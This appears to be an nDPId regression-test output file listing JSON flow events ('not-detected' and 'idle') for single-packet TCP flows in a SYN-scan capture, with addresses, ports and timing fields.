+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 